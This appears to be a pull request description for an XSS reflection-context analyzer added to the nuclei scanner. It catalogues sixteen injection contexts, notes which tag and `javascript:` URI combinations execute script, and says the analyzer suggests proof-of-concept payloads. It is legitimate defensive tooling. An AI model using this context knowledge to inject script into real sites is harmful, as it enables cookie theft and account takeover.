- **Confidence** — 0.0–1.0 score
- **IsExecutableSink** — true when JS runs directly without additional breakout
- **Explanation** — human-readable description
- **QuoteChar**, **AttributeName**, **TagName** — structural metadata

`AnalyzeAllReflections` scans the entire document for all occurrences; `AnalyzeReflectionContext` returns the most exploitable one.

Implements the `analyzers.Analyzer` interface (registered as `"xss_context"`) so it can be referenced in template YAML.

---

## Context types (16)

| Context | Example |
|---|---|
| `HTMLBody` | `<p>MARKER</p>` |
| `Comment` | `<!-- MARKER -->` |
| `AttributeDouble` | `<tag attr="MARKER">` |
| `AttributeSingle` | `<tag attr='MARKER'>` |
| `AttributeUnquoted` | `<tag attr=MARKER>` |
| `AttributeURL` | `<a href="MARKER">` |
| `AttributeEvent` | `<div onclick="MARKER">` |
| `AttributeStyle` | `<div style="MARKER">` |
| `Script` | `<script>MARKER</script>` or executable `javascript:` URI |
| `ScriptData` | `<script type="application/json">MARKER` |
| `Style` | `<style>MARKER { }\</style>` |
| `JSON` | `{"key": "MARKER"}` inside a script block |
| `Template` | `\`hello ${MARKER}\`` in a script block |
| `CDATA` | `<![CDATA[MARKER]]>` |
| `SrcDoc` | `<iframe srcdoc="MARKER">` |
| `Unknown` | marker not found or context unparseable |

---

## Key correctness decisions

**javascript: URI executability is tag-aware** (fixes #7086):
- `<a href="javascript:">` → `ContextScript` ✓ (executes)
- `<iframe src="javascript:">` → `ContextScript` ✓ (executes)
- `<img src="javascript:">` → `ContextAttributeURL` ✓ (does NOT execute)
- `<script src="javascript:">` → `ContextAttributeURL` ✓ (does NOT execute)

**First `type` attribute wins on `<script>`** (HTML5 spec):
- `<script type="application/json" type="text/javascript">` → `ContextScriptData` (non-executable)

**TagAttr() single-pass** — the tokenizer's attribute iterator is forward-only. Scanning in one pass prevents silent attribute dropping (e.g. `<script src="MARKER">` would be missed in a two-pass approach).

**Quote style detection** — the raw HTML source is probed to determine the actual delimiter (`"`, `'`, or unquoted) so breakout sequences are correct.

---

## Test coverage (55 test cases + 3 benchmarks, all pass)

```
$ go test ./pkg/fuzz/analyzers/xss/... -v
...
PASS
ok  github.com/projectdiscovery/nuclei/v3/pkg/fuzz/analyzers/xss
```

Covers:
- All 16 context types
- javascript: URI across 7 different tag+attr combos
- Event handler with single/double quote variants
- First-type-wins for duplicate `type` attrs on `<script>`
- Case-insensitive marker matching
- Nested quotes (double inside single and vice versa)
- Template literal detection
- Multiple reflections in one document (best context selected)
- Empty / missing inputs

**Benchmarks (Apple M4):**
```
BenchmarkAnalyzeReflectionContext_HTMLBody        898772   1267 ns/op    4896 B/op    21 allocs/op
BenchmarkAnalyzeReflectionContext_LargeDocument     9140  131626 ns/op  44468 B/op  1815 allocs/op
BenchmarkAnalyzeAllReflections                    677701   2145 ns/op    6208 B/op    32 allocs/op
```

---

## Checklist
- [x] PR created against `dev` branch
- [x] New package only — no modifications to existing files
- [x] Tests added (55 cases + 3 benchmarks)
- [x] All tests pass
- [x] `go build ./pkg/fuzz/...` succeeds
- [x] Implements `analyzers.Analyzer` interface
- [x] `javascript:` URI misclassification (#7086) fixed with tag-aware sink map

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->
## Summary by CodeRabbit

* **New Features**
  * New XSS reflection analyzer: detects and ranks reflections across HTML and JSON contexts (body, comments, attributes, scripts, styles, templates, srcdoc), reports confidence, and suggests context-aware proof‑of‑concept payloads and breakout guidance when exploitable reflections are found. Integrated into the scanning flow for automated analysis.

* **Tests**
  * Comprehensive test suite covering context detection, prioritization, payloads, edge cases, and benchmarks.
<!-- end of auto-generated comment: release notes by coderabbit.ai -->